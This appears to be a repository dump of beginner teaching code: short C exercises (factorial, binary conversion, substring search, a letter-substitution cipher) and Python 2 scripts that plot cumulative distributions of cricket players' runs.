reset_location.config(state=tk.NORMAL)\n\ncache_directory.trace('w', update_reset)\ncache_directory.set(\"\")\n\n# Rich presence\nrichpres = tk.LabelFrame(rootwin, text=\"Discord and Steam integration\")\nrichpres.pack(side=tk.TOP, fill=tk.X)\ndisableRichPresence = tk.BooleanVar()\ntk.Checkbutton(richpres, text=\"Show your location in Discord and Steam.\", variable=disableRichPresence).grid(row=0)\ndisableRichPresence.set(True)\n\n# Dynbone limiter\ndynbones = tk.LabelFrame(rootwin, text=\"Dynamic Bone Limiter\")\ndynbones.pack(side=tk.TOP, fill=tk.X)\ntk.Label(dynbones, text=\"Maximum amount of objects/bones movable by dynamic bones per avatar: \").grid(row=0, column=0)\ndynamic_bone_max_affected_transform_count = tk.StringVar()\ntk.Entry(dynbones, textvariable=dynamic_bone_max_affected_transform_count, width=4, validate='all', validatecommand=(verify, '%P')).grid(row=0, column=1)\ntk.Label(dynbones, text=\"Maximum amount of dynamic bone colliders per avatar: \").grid(row=1, column=0)\ndynamic_bone_max_collider_check_count = tk.StringVar()\ntk.Entry(dynbones, textvariable=dynamic_bone_max_collider_check_count, width=4, validate='all', 
validatecommand=(verify, '%P')).grid(row=1, column=1)\n\n# Picture settings\npictures = tk.LabelFrame(rootwin, text=\"Camera and screenshot settings\")\npictures.pack(side=tk.TOP, fill=tk.X)\ncamera_res_height = tk.StringVar()\ncamera_res_width = tk.StringVar()\nscreenshot_res_height = tk.StringVar()\nscreenshot_res_width = tk.StringVar()\ncamera_res_height.set(\"1080\")\ncamera_res_width.set(\"1920\")\nscreenshot_res_height.set(\"1080\")\nscreenshot_res_width.set(\"1920\")\ntk.Label(pictures, text=\"VR Camera picture size: \").grid(row=0, column=0)\ntk.Spinbox(pictures, textvariable=camera_res_width, width=4, from_=1280, to=3840).grid(row=0, column=1)\ntk.Spinbox(pictures, textvariable=camera_res_height, width=4, from_=720, to=2160).grid(row=0, column=2)\ntk.Label(pictures, text=\"Desktop screenshot picture size: \").grid(row=1, column=0)\ntk.Spinbox(pictures, textvariable=screenshot_res_width, width=4, from_=1280, to=3840).grid(row=1, column=1)\ntk.Spinbox(pictures, textvariable=screenshot_res_height, width=4, from_=720, to=2160).grid(row=1, column=2)\n\n# Particle limiter\nparticles = tk.LabelFrame(rootwin, text=\"Particle limiter settings\")\nparticles.pack(side=tk.TOP, fill=tk.X)\nparticle_system_limiter = tk.BooleanVar()\ntk.Checkbutton(particles, text=\"Enable particle system limiter.\", variable=particle_system_limiter).grid(row=0)\nps_max_particles = tk.StringVar()\nps_max_systems = tk.StringVar()\nps_max_emission = tk.StringVar()\nps_max_total_emission = tk.StringVar()\nps_mesh_particle_divider = tk.StringVar()\nps_mesh_particle_poly_limit = tk.StringVar()\nps_collision_penalty_high = tk.StringVar()\nps_collision_penalty_med = tk.StringVar()\nps_collision_penalty_low = tk.StringVar()\nps_trails_penalty = tk.StringVar()\ntk.Label(particles, text=\"Max particles per system: \").grid(row=1, column=0)\ntk.Entry(particles, textvariable=ps_max_particles, width=10, validate='all', validatecommand=(verify, '%P')).grid(row=1, column=1)\ntk.Label(particles, text=\"Max particles systems per avatar: \").grid(row=2, column=0)\ntk.Entry(particles, textvariable=ps_max_systems, width=10, validate='all', validatecommand=(verify, '%P')).grid(row=2, column=1)\ntk.Label(particles, text=\"Max speed of particle creation per system: \").grid(row=3, column=0)\ntk.Entry(particles, textvariable=ps_max_emission, width=10, validate='all', validatecommand=(verify, '%P')).grid(row=3, column=1)\ntk.Label(particles, text=\"Max speed of particle creation per avatar: \").grid(row=4, column=0)\ntk.Entry(particles, textvariable=ps_max_total_emission, width=10, validate='all', validatecommand=(verify, '%P')).grid(row=4, column=1)\ntk.Label(particles, text=\"Divide highest mesh particle polygon count: \").grid(row=5, column=0)\ntk.Entry(particles, textvariable=ps_mesh_particle_divider, width=10, validate='all', validatecommand=(verify, '%P')).grid(row=5, column=1)\ntk.Label(particles, text=\"Highest polygon count per mesh particle: \").grid(row=6, column=0)\ntk.Entry(particles, textvariable=ps_mesh_particle_poly_limit, width=10, validate='all', validatecommand=(verify, '%P')).grid(row=6, column=1)\ntk.Label(particles, text=\"Penalty for high accuracy collision: \").grid(row=7, column=0)\ntk.Entry(particles, textvariable=ps_collision_penalty_high, width=10, validate='all', validatecommand=(verify, '%P')).grid(row=7, column=1)\ntk.Label(particles, text=\"Penalty for medium accuracy collision: \").grid(row=8, column=0)\ntk.Entry(particles, textvariable=ps_collision_penalty_med, width=10, validate='all', 
validatecommand=(verify, '%P')).grid(row=8, column=1)\ntk.Label(particles, text=\"Penalty for low accuracy collision: \").grid(row=9, column=0)\ntk.Entry(particles, textvariable=ps_collision_penalty_low, width=10, validate='all', validatecommand=(verify, '%P')).grid(row=9, column=1)\ntk.Label(particles, text=\"Penalty for trails on particles: \").grid(row=10, column=0)\ntk.Entry(particles, textvariable=ps_trails_penalty, width=10, validate='all', validatecommand=(verify, '%P')).grid(row=10, column=1)\n\nmatchup = {\n    \"particle_system_limiter\"                  : particle_system_limiter,\n    \"ps_max_particles\"                         : ps_max_particles,\n    \"ps_max_systems\"                           : ps_max_systems,\n    \"ps_max_emission\"                          : ps_max_emission,\n    \"ps_max_total_emission\"                    : ps_max_total_emission,\n    \"ps_mesh_particle_divider\"                 : ps_mesh_particle_divider,\n    \"ps_mesh_particle_poly_limit\"              : ps_mesh_particle_poly_limit,\n    \"ps_collision_penalty_high\"                : ps_collision_penalty_high,\n    \"ps_collision_penalty_med\"                 : ps_collision_penalty_med,\n    \"ps_collision_penalty_low\"                 : ps_collision_penalty_low,\n    \"ps_trails_penalty\"                        : ps_trails_penalty,\n    \"dynamic_bone_max_affected_transform_count\": dynamic_bone_max_affected_transform_count,\n    \"dynamic_bone_max_collider_check_count\"    : dynamic_bone_max_collider_check_count,\n    \"cache_directory\"                          : cache_directory,\n    \"disableRichPresence\"                      : disableRichPresence,\n    \"camera_res_height\"                        : camera_res_height,\n    \"camera_res_width\"                         : camera_res_width,\n    \"screenshot_res_height\"                    : screenshot_res_height,\n    \"screenshot_res_width\"                     : screenshot_res_width,\n    \"cache_expiry_time\"                        : cache_expiry_time,\n    \"cache_size\"                               : cache_size\n}\n\nif os.path.isfile(file):\n    with open(file) as f:\n        settings = json.load(f)\n    # Slightly different between how we internally handle this and how VRC expects the save to be organized.\n    if not \"betas\" in settings.keys():\n        settings[\"betas\"] = []\n    settings[\"particle_system_limiter\"] = \"particle_system_limiter\" in settings[\"betas\"]\n    del settings[\"betas\"]\n    for k, v in matchup.items():\n        if k in settings.keys():\n            if k == \"disableRichPresence\": v.set(not settings[k])\n            else: v.set(settings[k])\n\ndef save_settings():\n    try:\n        global matchup\n        settings = {}\n        for k, v in matchup.items():\n            if k == \"disableRichPresence\": settings[k] = not v.get()\n            else: settings[k] = v.get()\n            print(k, v.get())\n            if isinstance(settings[k], str):\n                if settings[k].isdigit():\n                    settings[k] = int(settings[k])\n                elif settings[k] == \"\":\n                    del settings[k]\n\n        # Slightly different between how we internally handle this and how VRC expects the save to be organized.\n        if settings[\"particle_system_limiter\"]:\n            settings[\"betas\"] = [\"particle_system_limiter\"]\n        del settings[\"particle_system_limiter\"]\n\n        savestr = json.dumps(settings, indent=2)\n        with open(file, 'w') as f:\n            f.write(savestr)\n        tkinter.messagebox.showinfo(title=\"Save successful.\", message=\"New settings saved to config.json file. VRChat will need to be restarted for these changes to take effect.\")\n    except Exception as e:\n        with open('error.txt', 'a') as f:\n            f.write(str(e))\n            f.write(traceback.format_exc())\n        tkinter.messagebox.showwarning(title=\"Save failed!\", message=\"Something happened during the file save. 
Please report this to the GitHub and upload the error.txt file.\")\n\nsave_settings_button.config(command=save_settings)\n\nif not os.path.isdir(os.getenv('USERPROFILE') + \"\\\\AppData\\\\LocalLow\\\\VRChat\\\\VRChat\"):\n tkinter.messagebox.showerror(title=\"Folder not found\", message=\"Could not find folder where VRChat expects the settings file to exist.\")\n raise SystemExit\n\nrootwin.resizable(tk.FALSE, tk.FALSE)\nrootwin.mainloop()" }, { "alpha_fraction": 0.7598684430122375, "alphanum_fraction": 0.7664473652839661, "avg_line_length": 54.3636360168457, "blob_id": "b3ee915ed448116724cc71e0e0681c3794399a51", "content_id": "703e1a93fb86eb6c3a5a5b4529a28919fa89aacc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 608, "license_type": "no_license", "max_line_length": 107, "num_lines": 11, "path": "/README.md", "repo_name": "dj3520/vrcjson", "src_encoding": "UTF-8", "text": "# VRCJSON\n\nUser-friendly graphical interface for VRChat's config.json file. Because apparently someone had to make it!\n\n![Screenshot](https://github.com/dj3520/vrcjson/blob/master/vrcjson.png?raw=true)\n\n - This tool is not a modification to the game, so you are not breaking the Terms of Service by using it.\n - This tool is not made or endorsed by the VRChat team. Asking them for help won't help.\n - Any issues should be reported here.\n - There's a good chance this will need updates as time goes on.\n - If you've added something this tool is not expecting to your config file, pressing save will erase it." } ]
2
emresagir/traffic-route-helper
https://github.com/emresagir/traffic-route-helper
fdd0dae09f28c5d0bcb59aff5de5e8f9d7fd69c4
dc67a9f0eebde027e2b6d109d6125621d85d4bfb
b2d7a24c1491fc2ec0ce26bce6034e7b21571a45
refs/heads/main
2023-03-25T11:51:56.259150
2021-03-25T15:45:59
2021-03-25T15:45:59
351,490,722
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5625954270362854, "alphanum_fraction": 0.5748091340065002, "avg_line_length": 16.714284896850586, "blob_id": "7e6199c81c48e89612612767767cabb7c926f6ff", "content_id": "de52499d0a4706f31b9d59803e1541cedc1cb663", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1354, "license_type": "no_license", "max_line_length": 96, "num_lines": 70, "path": "/sqlite-functions.py", "repo_name": "emresagir/traffic-route-helper", "src_encoding": "UTF-8", "text": "import sqlite3 as lite\r\nimport sys\r\n\r\n#conn = lite.connect(\"main.db\")\r\nc = conn.cursor()\r\n\r\nc.execute(''' SELECT count(name) FROM sqlite_master WHERE type='table' AND name='customers' ''')\r\n\r\nif c.fetchone()[0] == 1:\r\n print('Table exist.')\r\n\r\nelse:\r\n print(\"Tablo yok, oluşturuluyor.\")\r\n c.execute(\"\"\"CREATE TABLE customers (\r\n ad text,\r\n soyad text,\r\n plaka text,\r\n kalkış_yeri text,\r\n varış_yeri text\r\n )\"\"\")\r\n print(\"Tablo oluşturuldu.\")\r\n\r\n\r\n\r\n#c.execute(\"\"\"INSERT INTO customers VALUES(\r\n#'Emre',\r\n#'Sağır',\r\n#'23 dl 434',\r\n#'ankara',\r\n#'bursa'\r\n# )\"\"\")\r\n\r\nc.execute(\"DELETE from customers WHERE rowid = 6\")\r\n\r\n\r\nc.execute(\"SELECT rowid, * FROM customers\") #rowid ile numarasını da alıyorsun satırın.\r\n #* ile de diğer bütün bilgileri.\r\n\r\n\r\nmüşteriList = c.fetchall()\r\nfor müşteri in müşteriList:\r\n print(müşteri)\r\nfor müşteri in müşteriList:\r\n print(müşteri[2])\r\n\r\nconn.commit()\r\nconn.close()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#secenekler = \"\"\"\r\n#1- Kayıtlı Rotaları Görüntüle\r\n#2- Yeni Rota Ekle\r\n#3- Çıkış\r\n#\"\"\"\r\n#while True:\r\n# print(secenekler)\r\n# secim = input(\"Hoşgeldiniz, yapmak istediğiniz işlemi seçiniz:\")\r\n# if secim == \"1\":\r\n# pass\r\n# if secim == \"2\":\r\n# pass\r\n# if secim == \"3\":\r\n# break\r\n" }, { "alpha_fraction": 0.5470930337905884, "alphanum_fraction": 0.5534883737564087, "avg_line_length": 22.253520965576172, "blob_id": "30e845a4b2b941cb33751078eec0306e303c4141", "content_id": "2356bb113039a150d5ad57a0144b9f736c964709", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1768, "license_type": "no_license", "max_line_length": 94, "num_lines": 71, "path": "/main.py", "repo_name": "emresagir/traffic-route-helper", "src_encoding": "UTF-8", "text": "import sqlite3 as lite\r\n\r\nconn = lite.connect(\"main.db\")\r\nc = conn.cursor()\r\nc.execute(''' SELECT count(name) FROM sqlite_master WHERE type='table' AND name='rotalar' ''')\r\nif c.fetchone()[0] == 1:\r\n pass\r\nelse:\r\n print(\"Tablo yok, oluşturuluyor.\")\r\n c.execute(\"\"\"CREATE TABLE rotalar (\r\n ad text,\r\n soyad text,\r\n plaka text,\r\n kalkis text,\r\n varis text\r\n )\"\"\")\r\n print(\"Tablo oluşturuldu.\")\r\n\r\n\r\ndef RotaGor():\r\n c.execute(\"SELECT rowid, * FROM rotalar\")\r\n rotalist = c.fetchall()\r\n for rota in rotalist:\r\n print(rota)\r\n\r\ndef rotaEkle(ad, soyad, plaka, kalkis, varis):\r\n conn.execute(\"\"\"\r\n INSERT INTO rotalar VALUES (?,?,?,?,?)\r\n \"\"\"), [(ad, soyad, plaka, kalkis, varis)]\r\n conn.commit()\r\n print(\"Bilgiler kaydedildi.\")\r\n\r\ndef secim():\r\n print(\"\"\"\r\n 1- Kayıtlı Rotaları Görüntüle\r\n 2- Yeni Rota Ekle\r\n 3- Çıkış\r\n \"\"\")\r\n inputsecim = input(\"Hoşgeldiniz, yapmak istediğiniz işlemi seçiniz:\")\r\n if inputsecim == \"1\":\r\n RotaGor()\r\n\r\n if inputsecim == \"2\":\r\n ad = str(input(\"Sürücünün Adını Giriniz:\"))\r\n soyad 
= str(input(\"Sürücünün Soyadını Giriniz:\"))\r\n plaka = str(input(\"Sürücünün Plakasını Giriniz:\"))\r\n kalkis = str(input(\"Sürücünün Kalkış Yerini Giriniz:\"))\r\n varis = str(input(\"Sürücünün Varış Yerini Giriniz:\"))\r\n rotaEkle(ad, soyad, plaka, kalkis, varis)\r\n\r\n if inputsecim == \"3\":\r\n print(\"ÇIKIŞ YAPILDI.\")\r\n conn.commit()\r\n conn.close()\r\n cikisFlag = 1\r\n return cikisFlag\r\n\r\n\r\ndef main():\r\n while True:\r\n cikisFlag = secim()\r\n if cikisFlag == 1:\r\n break\r\n \r\n\r\n\r\n\r\n \r\n\r\n\r\nmain()" }, { "alpha_fraction": 0.8181818127632141, "alphanum_fraction": 0.8181818127632141, "avg_line_length": 22, "blob_id": "23c22931920df0323553b46adab8f3487e3f74e1", "content_id": "7cfc4916a1eb8c6cfc5a3c44258c48c33fb07c11", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 22, "license_type": "no_license", "max_line_length": 22, "num_lines": 1, "path": "/README.md", "repo_name": "emresagir/traffic-route-helper", "src_encoding": "UTF-8", "text": "# traffic-route-helper" } ]
3
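The record above leans on sqlite3's positional "?" placeholders for its INSERT. A minimal, self-contained sketch of that binding pattern follows — the table and column names are taken from the repo, while the in-memory database and the sample row are illustrative assumptions, not part of the original project:

import sqlite3

conn = sqlite3.connect(":memory:")  # in-memory DB keeps the sketch self-contained
conn.execute("CREATE TABLE rotalar (ad text, soyad text, plaka text, kalkis text, varis text)")

def rota_ekle(ad, soyad, plaka, kalkis, varis):
    # The parameter tuple must be the second argument of execute();
    # sqlite3 then binds each value to one "?" placeholder in order.
    conn.execute("INSERT INTO rotalar VALUES (?,?,?,?,?)",
                 (ad, soyad, plaka, kalkis, varis))
    conn.commit()

rota_ekle("Emre", "Sagir", "23 dl 434", "ankara", "bursa")  # hypothetical sample row
print(conn.execute("SELECT rowid, * FROM rotalar").fetchall())

Passing the values as a separate tuple, rather than formatting them into the SQL string, also protects the statement against quoting problems and SQL injection.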
KseniaKuznetsova01/zadanie2
https://github.com/KseniaKuznetsova01/zadanie2
d99654c8a1fe71db7216f358baf53b883108e1e5
323777df10a1b12e0bd41a57876a44cdbab91429
4987c5677265d3f968fa7ef441f378db78ae7fa5
refs/heads/master
2023-02-08T05:51:10.772189
2020-12-22T18:15:00
2020-12-22T18:15:00
323,621,280
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5907859206199646, "alphanum_fraction": 0.5975610017776489, "avg_line_length": 21.393939971923828, "blob_id": "da9a92a1d772a1cb33959eb942a7ace700023715", "content_id": "8115cb8a8baaf048cad09546d142f63489ff1065", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 738, "license_type": "no_license", "max_line_length": 66, "num_lines": 33, "path": "/main.py", "repo_name": "KseniaKuznetsova01/zadanie2", "src_encoding": "UTF-8", "text": "import os\nimport tempfile\nimport json\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--key', help='key')\nparser.add_argument('--value', help='value')\nargs = parser.parse_args()\n\ndict1 = dict()\nstorage_path = os.path.join(tempfile.gettempdir(), 'storage.data')\n\ndef reading():\n with open(storage_path, 'r') as f:\n first = f.readline()\n if first != '':\n return json.loads(first)\n else:\n return {}\n\ndef key_val(key,val):\n if key in dict1:\n dict1[key] = val\n\n with open(storage_path, 'w') as f:\n f.write(json.dumps(dict1))\n\ndef main():\n if args.key != '' and args.val != 0:\n print(key_val(args.key, args.val))\n else:\n return(None)" } ]
1
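The main.py in this record is a tiny key-value store: argparse supplies --key/--value and a JSON file in the system temp directory holds the data. A runnable sketch of the same read-modify-write cycle — the storage path and flag names come from the record, the sample key and value are invented for illustration:

import json
import os
import tempfile

storage_path = os.path.join(tempfile.gettempdir(), 'storage.data')

def set_value(key, value):
    # load whatever is stored, update one key, and dump everything back
    data = {}
    if os.path.exists(storage_path) and os.path.getsize(storage_path) > 0:
        with open(storage_path) as f:
            data = json.load(f)
    data[key] = value
    with open(storage_path, 'w') as f:
        json.dump(data, f)

set_value('foo', 'bar')   # equivalent to: python main.py --key foo --value bar
with open(storage_path) as f:
    print(f.read())       # {"foo": "bar"}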
SUFIAN485/Online-teaching
https://github.com/SUFIAN485/Online-teaching
e7fef4129b81aa5365aef2d941937b9978df2efb
b8491c7a4e82ad56f815fa174736876e941009d7
a22ea7b4adffef7be9307b1dffce50b23dfe8d25
refs/heads/master
2022-02-16T13:49:40.142135
2019-09-14T07:22:00
2019-09-14T07:22:00
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.40082645416259766, "alphanum_fraction": 0.44214877486228943, "avg_line_length": 14.580645561218262, "blob_id": "aaa9c260ce8741dca41ac518b0d7e200f704a8b6", "content_id": "2f3425f7f45d4dca4a142a64c34153ee20c5604d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 484, "license_type": "no_license", "max_line_length": 40, "num_lines": 31, "path": "/week-7/1.cpp", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "/*\nCounting characters\n*/\n\n#include<stdio.h>\n#include<string.h>\n\nint main(){\n char ch[100];\n int count[123],index, i, len;\n\n for(i=65;i<123;i++){\n count[i]=0;\n }\n\n printf(\"Enter a string:\\n\");\n scanf(\"%[^\\n]\",ch);\n len=strlen(ch);\n for(i=0;i<len;i++){\n index=ch[i];\n count[index]++;\n }\n\n for(i=65;i<123;i++){\n if(count[i]>0){\n printf(\"%c=%d\",i, count[i]);\n printf(\"\\n\");\n }\n }\n return 0;\n}\n\n" }, { "alpha_fraction": 0.7986111044883728, "alphanum_fraction": 0.8263888955116272, "avg_line_length": 70, "blob_id": "286c757d2aa9838911c89028de84d846bc256051", "content_id": "7d812bade8ef8f94efba1c04684cccfe3ec68e1a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 144, "license_type": "no_license", "max_line_length": 84, "num_lines": 2, "path": "/README.md", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "This repository is to share code snippets for the Bengali programming tutorial site.\nhttps://www.youtube.com/channel/UCQm9dYZVU8j5VD-rHv8Tcxw\n\n\n" }, { "alpha_fraction": 0.5514184236526489, "alphanum_fraction": 0.5656028389930725, "avg_line_length": 13.410256385803223, "blob_id": "da8f0da8dd18c91256a3a9cc33494bc0da161f7d", "content_id": "15b34f4dbadadd3041f89b16304f8aaf7e410116", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 564, "license_type": "no_license", "max_line_length": 40, "num_lines": 39, "path": "/week-9/2.cpp", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "\n/*\nprogram for finding \nmax(x,y)*min(y,z)\nwith user-defined functions\n*/\n\n#include<stdio.h>\nint max(int, int);\nint min(int, int);\n\n\nint main(){\n int x,y,z, r1, r2, result;\n printf(\"Enter values for x,y, and z:\");\n scanf(\"%d%d%d\",&x,&y,&z);\n r1=max(x,y);\n r2=min(y,z);\n result=r1*r2;\n /*\n The previous 3 lines can be replaced by\n result = max(x,y)* min(y,z);\n */\n printf(\"The result is: %d\",result);\n\n return 0;\n}\n\nint max(int a, int b){\n if(a>b)\n return a;\n else\n return b;\n}\nint min(int a, int b){\n if(a<b)\n return a;\n\n return b;\n}\n\n" }, { "alpha_fraction": 0.4959677457809448, "alphanum_fraction": 0.5080645084381104, "avg_line_length": 12, "blob_id": "b8b7e98ca1aac90b7dc98af49762dcd1a88f755f", "content_id": "cc3a0427305288370abe4cfc6272a3f2848f6402", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 248, "license_type": "no_license", "max_line_length": 47, "num_lines": 19, "path": "/week-5/1.cpp", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "/*\nFind factorial of a number\n*/\n\n#include<stdio.h>\n\nint main()\n{\n int fact=1,i,n;\n printf(\"Enter a number: \");\n scanf(\"%d\",&n);\n for(i=2;i<=n;i++){\n fact*=i;\n }\n\n printf(\"The factorial of %d is %d\",n,fact);\n\treturn 0;\n\n}\n\n" }, { "alpha_fraction": 0.5064935088157654, "alphanum_fraction": 0.6017315983772278, "avg_line_length": 
12.529411315917969, "blob_id": "80eab0a922e704f975a47504d6364a8fcaa28288", "content_id": "3aa682407b987c13d00eb7043c3a923b336b31c6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 231, "license_type": "no_license", "max_line_length": 39, "num_lines": 17, "path": "/python/week-4/tmp2.py", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "values = [10, 20, 1, 1, 0, 5, 5,6,7,10]\n\nmax_run=20\ntot=float(len(values))\ncount = [0.0]*21\nfor v in values:\n\tcount[v]+=1\nprint count\n\ncdf=[]\n\nprev=0.0\nfor el in count:\n\tpr = (el/tot) + prev \t\n\tcdf.append(pr)\n\tprev = pr\nprint cdf\n\n" }, { "alpha_fraction": 0.4045197665691376, "alphanum_fraction": 0.4406779706478119, "avg_line_length": 17.41666603088379, "blob_id": "626af2cbf4da26f8b42321c137ed0126583d198d", "content_id": "d9b236a34dfe68d806c91df246337e9581cd60ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 885, "license_type": "no_license", "max_line_length": 50, "num_lines": 48, "path": "/week-7/3_corrected.cpp", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "/*\nFind if the second string is a substring of the\nfirst string.\n*/\n\n#include<stdio.h>\n#include<string.h>\n\nint main(){\n int i,j, decision=1, start, track, len1, len2;\n char ch1[100],ch2[100],c;\n printf(\"Enter the first string:\\n\");\n scanf(\"%[^\\n]\",ch1);\n scanf(\"%c\",&c);\n printf(\"Enter the second string:\\n\");\n scanf(\"%[^\\n]\",ch2);\n\n len1=strlen(ch1);\n len2=strlen(ch2);\n\n for(i=0;i<len1;i++){\n start=i;\n if(len1-start<len2){\n decision=1;\n break;\n }\n track=0;\n for(j=0;j<len2;j++){\n if(ch1[start]!=ch2[j]){\n track=1;\n break;\n }\n start++;\n }\n if(track==0){\n decision=0;\n break;\n }\n }\n\n if(decision==0){\n printf(\"Yes\");\n }\n else{\n printf(\"No\");\n }\n return 0;\n}\n\n" }, { "alpha_fraction": 0.5443425178527832, "alphanum_fraction": 0.5474005937576294, "avg_line_length": 14.523809432983398, "blob_id": "6577e2f1e33916a3221d11afbe8604010252aff6", "content_id": "70f20114eb5d458465304dc66f762d9dca640ec8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 327, "license_type": "no_license", "max_line_length": 51, "num_lines": 21, "path": "/week-5/6.cpp", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "/*\nChecking for perfect square number\n*/\n\n#include<stdio.h>\n#include<math.h>\nint main()\n{\n int n,sq;\n printf(\"Enter a number: \");\n scanf(\"%d\",&n);\n sq=sqrt(n);\n if(sq*sq==n){\n printf(\"It's a perfect square number\");\n }\n else{\n printf(\"It's not a perfect square number\");\n }\n\treturn 0;\n\n}\n\n" }, { "alpha_fraction": 0.3128555119037628, "alphanum_fraction": 0.3424345850944519, "avg_line_length": 17.680850982666016, "blob_id": "7b85f4c78e7d382839c470539802db720709f89d", "content_id": "f340463b8b2c402c6db70a213537a7c31ba948c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 879, "license_type": "no_license", "max_line_length": 42, "num_lines": 47, "path": "/week-7/2.cpp", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "/*\nDan Brown code problem 2\n*/\n\n#include<stdio.h>\n#include<string.h>\n\nint main(){\n int found,len, i,j;\n char ch[100];\n char part1[14]=\"ABCDEFGHIJKLM\";\n char part2[14]=\"NOPQRSTUVWXYZ\";\n printf(\"Enter the hidden message:\\n\");\n scanf(\"%[^\\n]\",ch);\n 
len=strlen(ch);\n\n for(i=0;i<len;i++){\n if(ch[i]==' '){\n printf(\" \");\n }\n else{\n found=0;\n for(j=0;j<13;j++){\n if(ch[i]==part1[j]){\n found=1;\n printf(\"%c\",part2[j]);\n break;\n\n }\n }\n\n if(found==0){\n\n for(j=0;j<13;j++){\n if(ch[i]==part2[j]){\n found=1;\n printf(\"%c\",part1[j]);\n break;\n\n }\n }\n }\n }\n }\n\n return 0;\n}\n\n" }, { "alpha_fraction": 0.6517571806907654, "alphanum_fraction": 0.664536714553833, "avg_line_length": 13.904762268066406, "blob_id": "b314b35a9f242354f8a0693790b9c04f8d0617bf", "content_id": "0f1bb21aa5a868b857f7c7330d7ffee62a331cd1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 313, "license_type": "no_license", "max_line_length": 32, "num_lines": 21, "path": "/python/week-4/readfiles.py", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "import os\n\nbase_path=\"data/mushfiq/\"\n\nlist_files=os.listdir(base_path)\ncount=0\nfor file in list_files:\n\tfr=open(base_path+file,\"r\")\n\n\t### ignore header\n\tline=fr.readline()\n\twhile 1:\n\t\tline=fr.readline().strip()\n\t\tif len(line)<3:\n\t\t\tbreak\n\t\tif \"run out\" in line:\n\t\t\tprint line\n\t\t\tcount+=1\n\n\tfr.close()\nprint count\n" }, { "alpha_fraction": 0.4265129566192627, "alphanum_fraction": 0.4524495601654053, "avg_line_length": 14.043478012084961, "blob_id": "2be79173ba07ff346c7d63d165182b02d065dccb", "content_id": "412ea77cf3bd31827384e52b63c761f83844d157", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 347, "license_type": "no_license", "max_line_length": 39, "num_lines": 23, "path": "/week-6/p1.cpp", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "/*\nDecimal to binary conversion\n*/\n\n#include<stdio.h>\n\nint main(){\n\n int i, n,remainder,a[100], index=0;\n printf(\"Enter a number: \");\n scanf(\"%d\",&n);\n\n while(n!=0){\n remainder=n%2;\n a[index]=remainder;\n index++;\n n=n/2;\n }\n\n for(i=index-1; i>=0; i--){\n printf(\"%d\",a[i]);\n }\n}\n\n" }, { "alpha_fraction": 0.5385864973068237, "alphanum_fraction": 0.585702657699585, "avg_line_length": 20.120689392089844, "blob_id": "80e27617200ebd3b27c011fbffd09dd88bff7921", "content_id": "753ce398b8350174e8cb67cf2f4e54de2ed7536d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2462, "license_type": "no_license", "max_line_length": 93, "num_lines": 116, "path": "/python/week-4/final_cdf_bd_players.py", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nfig = plt.figure()\nax = fig.add_subplot(111)\n\nlnst=[\"-\", \"--\",\"-.\", \":\", \"-\", \"--\",\"-.\", \":\"]\nmarks=[\"^\", \"d\", \"o\", \"v\", \"p\", \"s\", \"<\", \">\"]\n#marks_size=[15, 17, 10, 15, 17, 10, 12,15]\nmarks_size=[2, 2, 10, 15, 17, 10, 12,15]\nmarker_color=['#0F52BA','#ff7518','#6CA939','#e34234','#756bb1','brown','#c994c7', '#636363']\n\n\ndef collect_runs(records,years):\n max_run=-10\t\n for player in records:\n\n for year in years:\n fr=open(\"data/\"+\n player+\"/years/\"+year+\".txt\",\"r\")\n\n ### ignore header\n fr.readline()\n lines=fr.readlines()\n for line in lines:\n line=line.strip()\n\tparsed=line.split(\"\\t\")\n\trun = parsed[5]\n\n\ttry:\n\n if \"*\" in run:\n\t print run\t\n\t run = run.split(\"*\")[0]\n print run\n\t run = int(run)\n\t records[player][\"runs\"].append(run)\t\n\t if max_run<run:\n\t max_run=run\n\t 
